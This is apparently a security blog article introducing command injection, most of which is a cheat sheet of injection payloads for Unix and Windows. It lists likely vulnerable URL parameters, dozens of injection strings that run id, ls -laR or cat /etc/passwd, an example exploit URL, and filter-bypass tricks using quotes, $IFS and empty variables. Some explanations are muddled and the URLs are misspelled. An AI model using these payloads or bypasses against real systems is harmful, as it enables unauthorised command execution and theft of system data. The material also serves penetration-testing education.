AlbusSec:- Penetration-List 07 Command Injection — Sample
Hi Information Security folk, I hope you liked the SQL-Injection Sample Series, Where You learned about SQL-Injection In-depth, However, In today’s article we’ll start learning about Command Injection also known as Remote Command Execution, not Remote Code Execution. Firstly, I will introduce myself. So, I’m Aniket Tyagi and I’m an Information Technology officer at the 5f eco foundation of India, an Information Security Researcher, and the founder of Albus Security. Without Wasting our energy, Let’s get started.
Command Injection
Command Injection is an attack where the attacker will execute arbitrary system commands on the Target Operating System via a vulnerable application. Basically, An attacker injects operating system command through vulnerable params. therefore to run OS command remotely on the server that is running on the vulnerable application called Remote Command Execution. However, a lot of beginners think that RCE and Command-Injection are the same but it’s not because there is some difference. In Remote-Code-Execution, An attacker injects their own code to a server via vulnerable applications, not injecting OS Command to Server, With the help of Command Injection an attacker uses the Vulnerable server as a medium for attacks against other systems. Most common example “DOS Attack”.
- Possible Parameter For Command Injection
- Command Payload
- Exploitation
- Bypass Technique
Possible Parameter For Command Injection:-
?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}Common Payload:-
--> For UNIX;id|
;|/usr/bin/id|
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%0A/usr/bin/id%0A
%0Aid%0A
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id --> For Windoweval('ls')
eval('pwd')
eval('pwd');
eval('sleep 5')
eval('sleep 5');
eval('whoami')
eval('whoami');
exec('ls')
exec('pwd')
exec('pwd');
exec('sleep 5')
exec('sleep 5');
exec('whoami')
exec('whoami');
;{$_GET["cmd"]}
`id`
|id
| id
;id
;id|
;id;
& id
&&id
;id\n
ifconfig
| ifconfig
; ifconfig
& ifconfig
&& ifconfig
/index.html|id|
ipconfig
| ipconfig /all
; ipconfig /all
& ipconfig /all
&& ipconfig /all
ipconfig /all
ls
$(`ls`)
| ls -l /
; ls -l /
& ls -l /
&& ls -l /
ls -l /
| ls -laR /etc
; ls -laR /etc
& ls -laR /etc
&& ls -laR /etc
| ls -laR /var/www
; ls -laR /var/www
& ls -laR /var/www
&& ls -laR /var/wwwFor More Payloads, You can Visit Our Penetration-list Github Repo:- { Coming Soon }
Exploitation:-
Let’s take an example:- An Application is transferring the value of the userID parameter directly to the system command, to extract the user name from the server.
https://albusseccurity.com/login.php?verify=1
However, An application will send the request to a server for giving a username through userid, Since the application doesn’t sanitize the input, therefore an attacker will inject OS Command Injection.
https://albussecurity.com/login..php?verify= && ls
Whenever an attacker will interface the value of the verifyparameter and submit a malicious value to the server via a vulnerable parameter. then Server lists all the usernames in response because of the ls command. Vice-versa you can execute any system command such as PWD, whoami,nslookup, etc. And Also there are other meta-char that perform command injection. ; , & , && , | , || , ` , # ,
Bypass-Technique:-
Using Wildcard(*):-
We’ll use a wildcard(*) in the OS command
pi*ng albussecurity.com
Using Square Bracket:-
You can also use a square bracket in Payload
p[i]n[g] albussecurity.com
Concatenation Technique:-
We’ll use single quotes, double quotes, backslash, and forward-slash, and also you can use both of these.
Single-Quotes:-
'p'i'n'g albussecurity.com
pi''ng albussecurity.com
Double-Quotes:-
"p"i"n"g albussecurity.com
p""ing albusecurity.com
backslash and Forward slash:-
\p\i\n\g albusecurity.com
/\p/i//\\n\/g albussecurity.com
Using Uninitialized Variables technique:-
An uninitialized variable is treated as a null(noting), therefore We’ll use this technique to bypass
ping$u albussecurity.com
ping${u} albussecurity.com
ping$(u) albussecurity.com
p$(u)i$(u)n$(u)g albussecurity.com
p'u'i'u'n'u'g albussecurity.com
You can combine these patterns to form a new bypass payload.
Inject Payload inside {command}:-
In this, We’ll enter the payload inside braces
{ping,127.0.0.1}
Use an Internal field separator mechanism:-
You can use $IFS instead of spaces
ping${IFS}127.0.0.1
ping$IFS127.0.0.1
So finally here we come to an end, I hope You liked Command-Injection Article. However, It’s not a complete article, In this article things were synchronous. Very Soon I’ll publish the “Penetration List” In which You’ll get depth knowledge about Vulnerabilities. Because I’ll upload topics as a sample on medium, not a proper section. Thank You For Reading.
You can download a sample of the book:-
